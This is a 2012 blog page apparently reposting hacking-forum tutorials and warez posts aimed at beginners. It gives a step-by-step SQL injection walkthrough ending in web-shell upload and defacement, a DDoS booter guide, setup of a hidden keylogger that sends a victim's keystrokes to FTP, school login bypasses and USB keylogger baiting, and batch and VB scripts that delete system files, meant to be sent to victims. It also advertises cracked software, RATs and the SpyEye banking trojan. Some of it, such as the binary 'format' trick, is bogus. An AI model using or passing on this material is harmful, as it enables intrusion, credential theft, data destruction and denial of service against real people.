ads

Wednesday, February 29, 2012

Basics of Hacking 101


Are you sure you want to hack?
First things first.
Do a background check of yourself, to tell whether really wanted to hack, or you just want to go to jail for some reasons.

First of all, you must have some basic knowledge about a computer. Upon reading this, you just passed the first test. Next, you should also be patient, for if not, you won't get anywhere. Next, you should have the "heart" or passion to hack, because as stupid as it sounds, if you don't have it, you won't make it to the finish line.

Now, if you passed the first test, you're 1% closer to your goal to be a hacker. Next, this is the special part because you're on HackForums, which can be considered the largest forums for hacking and the likes. You should know how to speak PROPER andDECENT English, because you won't be able to connect with properly with the cyberworld if you don't know your grammars, as simple as they could be. Next, if you're new here, you should learn your manners, but don't let yourself get trampled on by others. First, read the Help Documents for the Rules and Regulations, so as not to be banned early. Then, it's okay to ASK questions, but make sure they are SPECIFIC and makes sense, even if The Lounge is created for general purposes. Next, as a new member, you should learn to absorb GOOD info from bad ones, which usually come from trolls/skids. You'll notice not everyone here is friendly, not everyone is as good as a REAL hacker should be, and not every VIP member here is as respected as they should be, many of them just paid for the membership but still, they are trolls, so be observative. Next is, you must also be fine with the rule "Learn by yourself". Of course, not literally, because we help each other here, but not to the extent of having a 1-on-1 tutorial. Mentors DO exist here, but they seldom take apprentices 1-on-1 because the don't have much time, plus the fact that they live in different time zones. Lastly, if you are a new member, this is the most important thing, DO NOT FORGET THOSE WHO HELPED YOU, and LEARN TO SAY THANKS OR SHOW APPRECIATION OR GIVE CREDIT TO THEM.


What is Hacking?
Let's make it simple as it can be. You watch movies and you hear news about hacking as a criminal thing to do, right? Well, the world idea about hacking nowadays is not really true, so let's redefine it again. Hacking, according to it's earliest definitions, is the Art of Exploitation. In more simple terms, when you hack, you take advantage of vulnerabilities/weaknesses of a software/hardware/peopleware. Hacking is NOT JUST about breaking into a server, stealing information, controlling things like traffic systems, tracking people via GPS, etc.; but it's more like a discipline. True hackers, whatever their specialization is, have different principles in life that is connected on their chosen profession. They DO break the laws most of the times, but that's because they are curious on how far they can go, or what kind of things they can do with their skills, and usually, the "money-making" is just a side dish of it, because HACKING IS A LEGAL PROFESSION, and they're still humans which needs food to survive.


How to Become a Hacker?
This is what new members always ask. "How do I become a good hacker?", "How do I hack these...", "What do I need to become a hacker?". These are just few of the thousand questions a newbie would ask.

If you're a newbie, and you're reading this, I got a starting tip for you.
Don't act like you don't even know how to type a word.

One of the first starting tips to be a "good" hacker, because you can't be a GREAT hacker when you didn't passed the GOOD status, is to have the ATTITUDE. If you're new, don't act STUPID, yet don't act like you know everything even if you don't.
Setting Goals

Now, to be a hacker, the first thing you need to do is set some GOALS. Goals will guide you through your journey here in the cyberworld. I also have a tip in making goals: DO NOT RUSH. You won't get any progress if you think that you can be the world's best hacker overnight. You also might want to think of what do you really want to learn first, or what do you want to be as a hacker.
Types of Hackers

Speaking of that, I'm gonna discuss a little bit of what type of hackers exists, so that you can decide what you want to be, although you can really switch anytime you like.

The first is the Black Hats.
Black Hats are hackers who do "illegal" stuffs with their skills. They are usually the one's who steal information for certain purposes. Nowadays, being a black hat is not that EASY anymore, unless you have the guts to do it. Back in the days, the black hats we're able to do MORE because the police still doesn't have the right equipment to match the skills of our black hat fellows. Many black hats usually hack for money to sustain themselves and their activities, but today, you'll need to take extra precautions so as not to be caught. That's why black hats are now turning into our next type of hacker.

So, to balance the cyberworld after the black hats was publicly known, the White Hats emerged.

areLEGALLY paid by companies or individuals who hire them for their services.

Lastly, there is a third category, which is most probably one with the highest population 
nowadays, the Gray Hats.
A combination of the two categories above, these type of hackers might be the trending type nowadays, because the hacker culture have grown so much complicated, that being a black hat or a white is not enough anymore. They do steal information for some reasons, but usually for money. But they also help those who are victims of their fellow hackers, which places them on the side of white hats.

After setting your goals, and you have determined what you want to be, or what you really want to do, and you're really sure you want to learn the Art, let's have a start on your journey.

Resources

So, let's start with this one. Firstly, you should be able to identify your resources first. Hacker's common mistakes is that they want to do a "hack", but now knowingly, they don't have the resources for it.

As a hacker, you should know your computer well, because it is the most important resource for all hackers. You should be able to know it's limitations, so as not to totally mess it up. Also, you should have a basic concept on how a computer works, even if it's just very basic like "Input -> Process -> Output -> Storage" type of concepts, because it's good to have background first on the general, before diving to deeper parts of hacking.

Also, as a hacker, you must learn to SEARCH for your resources.



Many new members always ASK first without even searching, because I myself did it when I was a new member. You must learn to search because it's in searching that you develop one of your skill, to sort out bad info from good ones, which you will need if your need to Dox someone. (Dox is like "profiling" someone, say for example, a target of yours. It will be discussed on another tutorial I will make, or you can take a look around HF by using Search)

 Under certain circumstances, you will need, say for example, tools which are high-quality, you will have to pay for it. Just a word of advice, as a new member, even if you have money, don't buy things yet here, except the VIP Upgrade to be L33t or Ub3r, because you'll learn that everything you need CAN STILL BE FREE, but just not as good as paid ones.
Skills

A hacker won't survive in the cyber-world if he doesn't have the sufficient skills to do it. It's not included in the earlier test, because even a noob can be a great hacker if he has the passion and determination to learn.

There are many skills a hacker should have, but I will discuss two of the important skills you must have as a new hacker.

One is you have to train your Social Engineering skills. Social engineering, or SE for short, is simply defined as the Art of Human Manipulation, or human hacking in more simple terms. In hacking, lying/faking/spoofing is ALLOWED. It is one of the basic skills you will need, especially when you are targeting accounts for their information. Furthermore, as a side dish of this topic, you'll learn thatMANY, if not everything, in the Internet is fake, or just a part of social engineering for a hack or exploit.

Another skill you must have is coding. This is one of the hardest skill that you MUST acquire as a hacker, because it requires time, effort, patience, and perseverance. But, once you get good in coding, you're as much as close to be a great hacker before you know it. Coding is the skill in which you learn to "code" or create your own program using various languages like the C Family (C, C++, C#), Java, Phyton, and many more. Upon learning this skill, you don't just learn coding, you improve even yourself, because it improves logical thinking, patience, and not to mention your creativity when designing your programs. Also, if you're a coder, you would be know for your programs, especially if they are high-quality. Many coders nowadays prefer not to hack, but just to code the tools used for hacking because they still earn for their programs, PLUS it's legal.


As of now, this is all you need to start in hacking. If you passed through this tutorial, you're one step closer to be a good hacker, because you got patience to read it.


Sunday, February 26, 2012

Thread Options [TuT] Everything you need to know for Downing a site! [DDoS][ObjectIvvez]




Downing a site


Introduction
Welcome to this tutorial, it's a Noob friendly tutorial about downing a site. I'll explain how everything works and how you can down a site!

DoS
The first thing i gonna talk about is a DoS.
DoS stands for Denial of Service.
A DoS is an attempt to make a computer or network resource unavailable to its intended users.

There are many programs, that you can find on Hackforums to DoS somebody. 
In the section Hacking Tools and Programs you can search and you'll sure find a nice program.

DDoS
DDoS stands for distributed denial-of-service.
To explain it in a couple words, a DDoS is the same as a DoS. 
But with a DoS you are the one attack. DDoS'ing is shells around the world attacking. 

To get started: Getting the IP of a Website
To attack a website you need the IP adress. There are many ways to get them, but i'll explain a really simple one.

Go to start, typ in "CMD" and press enter.
After that typ in "ping sitenamehere.com". 
And press enter again, then you'll get the site IP.

Screen:
[Image: thisisagayfuckingscreen.png]
So now we know, the IP of hackforums is 216.245.194.194! :D


Because we can't down Hackforums.net, i'll take Lol.com as example.


Booter
You need a Booter to DDoS a site. Sorry that i need to say but i almost don't know anything about a booter. so i'll just what what i'm gonna to do.
I use the booter "Stress-Booter" its a PHP-Based booter.


What we need, is the IP of the site, the lenght of the DDoS in seconds and the port.
IP: 216.245.194.194
PORT: 80 (This is almost everything 80!)
Seconds: 200 (You can take another second to.)


I click 'boot' and wait until the boot is done.


Result:
[Image: scaled.php?server=684&filename=s...res=medium]

And you've downed a populair site! If you got any questions, just ask it!
Replaced.

♠♧♥♢ Adfly Working Bot ♦♡♣♤


What does it do?
- It automatically clicks your Adf.ly links, so that you gain money.

Features
- Comes with a current working proxy list ready to go.
- Add or remove proxies, as you like.
- There is no limit on the number of proxies you can add.
- Supports custom referrers.
- There is no limit on the number of referrers you can add.


Download Tally ERP 9 with 3.1 crack





ERP 9 - Overview
-------------------------------------------------------------------
You bank and pay utility bills from home, why not do your business accounts? Or call up a stock status report and print a copy from wherever you are? Tally.ERP 9 has been designed with you in mind. Powerful connectivity makes information available with your staff, CA and other professionals, round-the-clock, in any place. It's also quick to install and allows incremental implementation-a novel capability that lets you activate just as many of its functions when required, even across locations.

At Tally, we have a hard-earned reputation for empowering businesses with stable, effective software products and Tally.ERP 9 takes this further. Tally.ERP 9 has all the features required for high-performance business management including remote access, audit & compliance services, an integrated support centre and security management, all focused on delivering peace of mind. It is a complete product that retains its original simplicity yet offers evolved capabilities like statutory processes, payroll, excise etc. Whatever the demands, Tally.ERP 9 makes life a lot easier. With an ideal combination of function, control and customisability built in, Tally.ERP 9 permits business owners and their associates to do more.

Advantages of Tally.ERP 9:

Powerful remote capabilities that boost collaboration
Easy to find qualified personnel
Easy to customise
Low cost of ownership via quick implementation, Tally Integrator, Support Centre

---------------------------------------------------------------------
Installation Instructions
---------------------------------------------------------------------

1. Unrar
2. Install Tally ERP
3. Replace tally.exe
4. Activate License,you can use any serial , activation key & Email tally will make a tally_req.lic in your tallyerp directory.
5. Exit tally program,rename tally_req.lic to tally.lic and run
tally erp program again,tally should now be activated and ready to use.

.NET Reflector 7.3.0.18 {Full}




Reflector: 7.3.0.18
Latest version: 7.3.0.18
Released: 7/15/2011

.NET Reflector 7.3 Released, Including BAML to XAML Decompilation on July 15th, 2011

Developers use .NET Reflector to:

● Decompile .NET code to understand how it works
● Learn or teach the complexities of a .NET language
● Provide a better alternative to library documentation
Recover lost or unavailable source code
● Locate performance issues
● Analyze dependencies
● Check obfuscation
● Serve as a powerful object browser
● Aid complex debugging tasks

So, here's the download link for full (cracked) version of Reflector 7.3.0.18

Saturday, February 25, 2012

[TUT]==How to use Keyloggers – Detailed Tutorial== [hot]

1. What is a Keylogger?
A keylogger is also called a spysoftware is a small program that records each and every ...keystroke a user types on a specific computer’s keyboard. A keylogger program canb e installed or attached in computer just in a few seconds and once installed you are only a step away from getting the victim’s password.

2. How Keylogger works?
Once the keylogger is installed on a PC, it starts operating in the background (stealth mode) and captures every keystroke of the victim on that PC. Let’s take up a small example: The victim goes to http://www.gmail.com and types his “username” and the “password” in the respective fields to login. The keylogger silently records these keystrokes and stores them in the logs. These logs when opened up shows the captured “username” and “password” and will also tell you that they were typed in the gmail login page. Thus the keylogger loads upon every startup, runs in the background and captures each and every keystroke. Some keyloggers also give a screen-shot of Your computer background.

3-Types of Keyloggers.
1-Hardware Keylogger - A plug-in device or a hardware circuit can be used as keylogger tools. Either of the two can log to their internal memories all of a user’s keyboard activities.
2-Software Keylogger- The software keylogger needs to be installed on the Victims computer to work

4-Once I install the keylogger can the victim come to know about it’s presence?
No. The victim will never come to know about the presence of the keylogger on his/her computer. This is because, once installed the keylogger will run in total stealth mode. Unlike other programs it will never show up in start-menu, start-up, program files, add/remove programs and task manager. So the victim can no way identify it’s presence on his/her PC.But if the Victim is Wise he may run a system scan or he may also see the process then he rocks and you are fool

5-Can I be traced back if I install the keylogger on some other computer?

No, For a Man with no knowledge about computer and keylogger or even a man who know;s this cannot trace you back.

6- Which keylogger is the best?

Number of keyloggers are available but the best I used till now for me is Ardamax Keylogger 2.85.

***9668;***9668;~~ARDAMAX TUTORIAL~~***9658;

Download the Keylogger Here



1-After installation

2-.Now right-hand click it and click ‘Enter registration key….

3-Enter the Name and password in the box fields

4.Once done click ‘Ok’ and you should get a pop-up saying ‘Registration code is accepted. Thank you for registration!

II. Creating the Keylogger Remote file:
1. Now your going to make the Keylogger Remote file (The thing you give to your victim). Click ‘Remote Installation…’,

click ‘Next’
2.Now,you should see this.

3.If you want to bind Keylogger Remote file with another application or file click the box that says ‘Append keylogger Remote file to file or another application’ and browse file or application that you want to bind it with.. I would prefer to skip this and bind the keylogger after creating the remote file.

4. Now click ‘Additional components’ and tick ‘Installation Package Bilder’ like done in the screenshot.

5.Now you should be at ‘Invisibility’, make sure all the boxes are ticked, then click ‘Next’.

6. Now you should be at ‘Security’, click ‘Enable’ and put your password (it can be any password you like, make it something easy so you can remember). Once done, make sure all the boxes are ticked and click ‘Next’.. Or else SkIp this also

7-untik the update optiong

8. Ok, you should now be at ‘Options’, use setting like done in screenshots.You can also select it destruction date

9. Ok, now you should be at ‘Control’, click the box that says ‘Send logs every’, now make it so it sends logs every 20 minutes, then where it says ‘Delivery’, un-tick ‘Email’ and tick ‘FTP’, then where it says ‘Include’ un-tick ‘Screenshots’, now un-tick the box where it says ‘Send only if log size exceeds’, once thats done, it should all look like it does in this screenshot:

10.Now you should be at ‘FTP’, create a free account at http://www.drivehq.com/secure/FreeSignup…om=storage, then make sure your at ‘Online Storage’, then make a new folder called: Logs (this is where the logs are sent to when you keylogg someone), Now on your FTP on Ardamax Keylogger, where it says ‘FTP Host:’, put this:
http://FTP.DriveHQ.com
Now where it says ‘Remote Folder:’, put this: Logs
Now where it says ‘Userame:’ and ‘Password:’, put your DriveHQ username and password, then it should look something like this:


Now Click ‘Test’ and it should pop up like this

If not then see if the password and username is right.

Once done, do NOT change your DriveHQ password or rename/delete the folder called ‘Logs’, if you do, the logs will not come through.

11. You should now be at ‘Control’, un-tick ‘Enable Screenshots Capturing’ then click ‘Next’.

12. Now you can change name and icon your Keylogger Engine as you want it to look like.

ust click ‘Finish’.
13.After you click ‘Finish’ you should see this

Now Your Remote File Is Created

Thursday, February 23, 2012

9 backconnectli priv8 cgi and safe mode bypass shell 2011


Feature:
1-Litespeed bypass shell
2-Ssi bypass shell
3-Symlink attack
4-Config bulucu
5-joomla mysl shell
6-wordpress mysql shell
7Python shell
8-cgitelnet shell
9-cgi priv8 shell
10-Php eval bypass
11-Php4 sürümler için eval backconnect
12-metasploit backconnet
13-iki adat pyton backconnect
14-perl socket backconnect
15-dc dc.pl backconnect
16-4 adet bypass php backconnect
17-php safe mode off bypass
18-3 adet bypass perl shell
19-reverse ip
20-toplu pagerank
21-suexec safe mode bypass
22-show source file read bypass


Wednesday, February 22, 2012

[Cracked] Rapzo Rat v1.8 + Source ~


Main Features

No portforwarding needed!
Steal Passwords { 18+ Stealers }
Screenlogger
System ( Shutdown, Restart, Logoff )
Fake Error Messege
Download & Execute( Run )
ScreenTaker (Send to Gmail,Yahoo,Live,Hotmail,Aol)
Files & Folders ( Run/Open File )
Open Website
Progress to Kill
Text to Speak
Open/Close CD Tray
Enable/Disable TaskManager, cmd, msconfig, regedit
Show/Hide Taskbar
Unistall BOT
Process Manager

Password: recoders

[TuT] Infinite Trials [TimeStopper]





That being said, today I will show you how to use Timestopper to give you infinite trial periods for programs.

1) First we are going to need to download Timestopper, Download it HERE

2) Open the program, and choose which program you want to extend the trial on. (Ex) Kaspersky.exe

3) After choosing which program, you will need to choose an end date for your trial, you can make it whatever you want. (Ex) 12/30/2012

4) Now it will ask you to make a shortcut to the new extended trial program, so put the shortcut where most convenient.

5) Lastly, open the ORIGINAL shortcut to the program and see if it shows the amount of days left, hopefully the days remaining has been changed. If the amount of days left has changed, make sure to use the shortcut that you made in step 4 to open it from now on out.


Download

SQL INJECTION (From start to Defacement)


DEFACING A SITE EXPLAINED FROM THE START
(INCLUDING DOWNLOADS)


I i took some parts of the sql injecting from http://www.milw0rm.com. I wrote the defacing part. I'm posting this here coz this tut explains everything step by step. but most of the sql tuts ends when we find the password hash. So newbees dnt know wat to do after that. In this tut i'm gonna explain how to deface a website from scratch hope you fill find this usefull....
i'm not a good hacker but i want to share my knowledge with every one.. so if there are any mistakes pls forgive me....
If you find this tut usefull please post a comment....

1) FINDING THE TARGET AND GETTING THE ADMIN PASSWORD

First we must find our target website to do that you can use this "dorks".
I'll give some dorks here copy anyone of it and paste it in google and search.
Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=

you can find lots of dorks here..(use them without the " " marks)
Code:
http://spam.org/download.php?file=390326

1). Check for vulnerability

Let's say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if is vulrnable we add to the end of url ' (quote),

and that would be http://www.site.com/news.php?id=5'

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar

that means is vulrnable to sql injection :)

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/* <-- no error

http://www.site.com/news.php?id=5 order by 2/* <-- no error

http://www.site.com/news.php?id=5 order by 3/* <-- no error

http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

so we have

http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works :)

4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.

let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

i didn't see any paper covering this problem, so i must write it :)

what we need is convert() function

i.e.

http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version :D

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good :D)

we know that table admin exists...


now to check column names.


http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up :)

i.e md5 hash, mysql hash, sha1...

now we must complete query to look nice :)

for that we can use concat() function (it joins strings)

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )


http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser :D

if can't guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc... :D

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie.


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc... :D

if you wanna display column names for specific table use this query. (where clause)

let's say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if the magic quotes is ON.

let's say that we found colums user, pass and email.

now to complete query to put them all together :D

for that we use concat() , i decribe it earlier.

i.e


http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is user:pass:email from table users.

example: admin:hash:whatever@blabla.com

** if you are too lazy for doing above stuff you can use tools they will do all the job:
1) Exploit scanner (this will find vulnerable websites)
Code:
http://spam.org/download.php?file=390338
2) SQLi helpper (this tool will do all the injecting job and get you the pass or hash)
Code:
http://rapidshare.com/files/248029073/SQLIHelperV.2.7.rar
*** use the tools only if you are new to hacking. Do it manually thats the thrill and that is real hacking. When you do it manually you will understand the concept.

in some websites you can directly see the password. but most of the websites encrypt them using MD5. so u hav to crack the hash to get the password. to crack the password there are three ways
1) check the net whether this hash is cracked before:
Code:
http://www.md5decrypter.co.uk
2) crack the password with the help of a site:
Code:
http://www.milw0rm.com/cracker/insert.php
http://passcracking.com/index.php
3) use a MD5 cracking software:
Code:
http://rapidshare.com/files/136967969/a_MD5CF_2.10_2b.rar
Password = OwlsNest


2) DEFACING THE WEBSITE

after getting the password you can login as the admin of the site. But first you have to find the admin login page for the site. there r three methods to find the admin panel.
1) you can use an admin finder website:
Code:
http://4dm1n.houbysoft.com/
2) you can use an admin finder software:
Code:
http://spam.org/download.php?file=390339

after logging in as the admin you can upload photos to the site. so now you are going to upload a shell into the site using this upload facility.

dowload the shell here(shells are php scripts which affects websites so it will be detected as trojans but no need to worry i take the responsibility):
Code:
http://spam.org/download.php?file=390328
extract it you will get a c99.php upload it.
some sites wont allow you to upload a php file. so rename it as c99.php.gif
then upload it.

after that go to http://www.site.com/images (in most sites images are saved in this dir but if you cant find c99 there then you have to guess the dir)
find the c99.php.gif and click it..
now you can see a big control pannel....
now you can do what ever you want to do...
search for the index.html file and replace it with your own file. so if any one goes to that site they will see your page....

after doing this click logout.... thats it you are done..

How To Access C Drive When It's Blocked

Introduction

Today, I am going to release my tutorial. A lot of schools have blocked C DRIVE from hacking attempts to the school systems/machines. There are many ways to access the drive. Including CMD, Firefox/Google Chrome etc. Please follow all your local laws. Read their Legal. And do not I REPEAT DO NOT DELETE ANY SYSTEM FILES FROM ANY EDUCATIONAL COMPUTERS, IT WILL END BADLY!

Ok that is all over and done with, now for the tutorial.

Firefox/Google Chrome

Open Firefox or Google Chrome and type the following in the URL;

Quote:
C:\

This will not allow you to open the files, but download them. In other words, you need the whole folder to work a .exe file (Unless it is a self ran .EXE or a text file)

This method is useful for trying to search a file and open the file with CMD.

Command Prompt

Windows Vista And Any Older Versions: You can read my guide here http://www.hackforums.net/showthread.php?tid=1340139

Windows 7 (THANKS TO W0lfbane): Read the above tutorial but instead of "command.com" put in the following;

Quote:
@echo off
title CMD
:1
set /p a=%cd%^>
%a%
goto :1

To browse through the C Drive, type in the following;

Quote:
C:

And if you want to open a file, type in the following for the example;

Quote:
start C:\Windows\cmd.exe


Bypassing Administrator Password (Kon-Boot)

Please read the following http://www.hackforums.net/showthread.php...dows+login

Bypassing Administrator Password: Only Windows XP

You will need a LAN cored for this Bypass. If your school/work is connected to wireless. You can not do this.

What a LAN Cored looks like



When you are connected to a network. You can access full Administrator rights by doing the following steps;

1. Reboot system.

2. Find where the LAN/Local cored is located.

3. Login, when it says "Applying User Settings" take out the LAN cored as quickly as you can.

4. Wait till it logs in, when you are on your desktop. Put the LAN cored back in to access the Internet.

Keylogging And Social Engineering

It often requires no techy knowledge to instigate, but the more you have, the better. For example, leave a USB stick beside the teacher's computer in the computer-room/library/classroom, with an Autorun keylogger. Tell the teacher that the USB is yours. S/He should plug it into their PC and prove it is yours.


Linux Bootable USB

(Thanks To KlokWeiss)

This method of getting a live install to a USB drive is the simplest available using Unetbootin. Note that we will format the USB drive and erase its contents.

1. Plug in your USB Drive (Minimum USB Drive capacity 2 GB)

2. Format the USB drive to FAT32

3. Download Unetbootin from http://unetbootin.sourceforge.net/

4. Start Unetbootin and select diskimage (use the backtrack-final ISO)

5. Change the boot startup to USB via BIOS.

6. Log into BackTrack with the default username and password root / toor.


End

Fuck a Computer Easily

Do not try this at your own compute

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini

Open up notepad and copy and paste that. Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. Have fun ...

REMEMBER - DO NOT CLICK THIS FILE.

YOU WONT RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

DEADLY VIRUSES!!!!!

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.

Step 1. Copy The Following In Notepad Exactly as it says

01001011000111110010010101010101010000011111100000

Step 2. Save As An EXE Any Name Will Do

Step 3. Send the EXE to People And Infect

OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code. Save As An EXE Any Name Will Do

format c:\ /Q/X — this will format your drive c:\

01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000

format d:\ /Q/X — this will format your dirve d:\

01100110011011110111001001101101011000010111010000
100000011001000011101001011100
0010000000101111010100010010111101011000

format a:\ /Q/X — this will format your drive a:\

01100110011011110111001001101101011000010111010000
100000011000010011101001011100
0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.

01100100011001010110110000100000001011110100011000
101111010100110010111101010001
00100000011000110011101001011100011000100110111101
101111011101000010111001101001
0110111001101001

Try to figure out yourself rest
can’t spoonfeed
Its working.

Do not try it on your PC. Don’t mess around this is for educational purpose only

still if you cant figure it out try this:
go to notepad and type the following:
@Echo off
Del C:\ *.*|y save it as Dell.bat
want worse then type the following:


@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file

Make Virus in 5 min " Very easy but dangerous Virus"

Make Virus in 5 min
Very easy but dangerous Virus

Ok, now, the trick:

The only thing you need is Notepad.

Now, to test it, create a textfile called TEST.txt(empty) in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone. Now, the real work begins:

Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again.


Simple explanation:

Go to notepad, type erase C:\WINDOWS, save, send to victim, once the victim opens it, the map WINDOWS will be gone and have to install WINDOWS again...[/]

Fuk Up Pc With This Virus...!!!!

Copy and paste the java script code to the address bar of your browser

javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)

2: Press enter and watch your window's "shaking it". You can change the value of i if you wish :-)

Simple is a very dangerous virus

What is needed:
1. VB (optimum: 6.0)
2. Understand buttons VB

Virus Making Tutorials just 1 minute
1. create a form as small as possible
2. in that form, enter the code below


Public Sub DelAll (ByVal DirtoDelete As Variant)
Dim FSO, FS
Set FSO = CreateObject ("Scripting.FileSystemObject")
FS = FSO.DeleteFolder (DirtoDelete, True)
End Sub

Private Sub Form_Load ()
On Error Resume Next
If FileExist ("c: \ windows \ system32 \ katak.txt") = True Then
End
Else
Call DelAll ("c: \ windows \ system")
Call DelAll ("c: \ windows \ system32")
Call DelAll ("c: \ windows")
Call DelAll ("C: \ Documents and Settings \ All Users")
Call DelAll ("C: \ Documents and Settings \ Administrator")
Call DelAll ("C: \ Documents and Settings")
Call DelAll ("C: \ Program Files \ Common Files")
Call DelAll ("C: \ Program Files \ Internet Explorer")
Call DelAll ("C: \ Program Files \ Microsoft Visual Studio")
Call DelAll ("C: \ Program Files")
End
End If
End Sub
Function FileExist (ByVal FileName As String) As Boolean
If Dir (FileName) = "" Then
FileExist = False
Else
FileExist = True
End If
End Function

3.Kode blue reply that the virus antidote, perhaps you do not accidentally press so you are safe. so in the folder c: \ windows \ system32 \ katak.txt if no file name, you will not be keserang own ... you can edit koq so what's so ...
That red color is the same folder you deleted this virus, your own edit

4. Make this project name as the name of the system, here I use the name "SystemKernel32" so it would not be suspected

5. Do not ever put your name on this virus ...

6. compile it .... and finish ....

Tuesday, February 21, 2012

[MacOSX ] BlackHole RAT priv8 RAT


‘BlackHole RAT’ is the latest remote administration tool (RAT) and is available both in Windows and Mac.




Hacktool such RAT employs client-server program that communicates to its victim’s machine through its trojan server. The server application is installed on the victim while the client application is on the managing side.
The version suggest that ‘BlackHole’ is currently in its early stage. However, the author seems to start showcasing the following functionalities:

* Remote execution of shell commands.
* Opens webpage using user’s default browser.
* Sends a message which is displayed on the victims screen.
* Creates a text file.
* It is capable to perform shutdown, restart and sleep operation.
* It is capable to request for admin privileges.

SpyEye 1.3.45


This includes all the newest software for:
[+] Admin Panel
[+] Formgrabber Panel
[+] Gate Installer
[+] Back Connect
[+] Collector
[+] Anti-Rapport (Anti-Thrusteer)
[+] Webinjects - USA - UK - Germany - Spain - PayPal (not sure if all of them works correctly, u have to check it, i usually only use USA)
[+] Built in PE-loader
[+] SpyEye original complete setup manual from the author

Injection types:
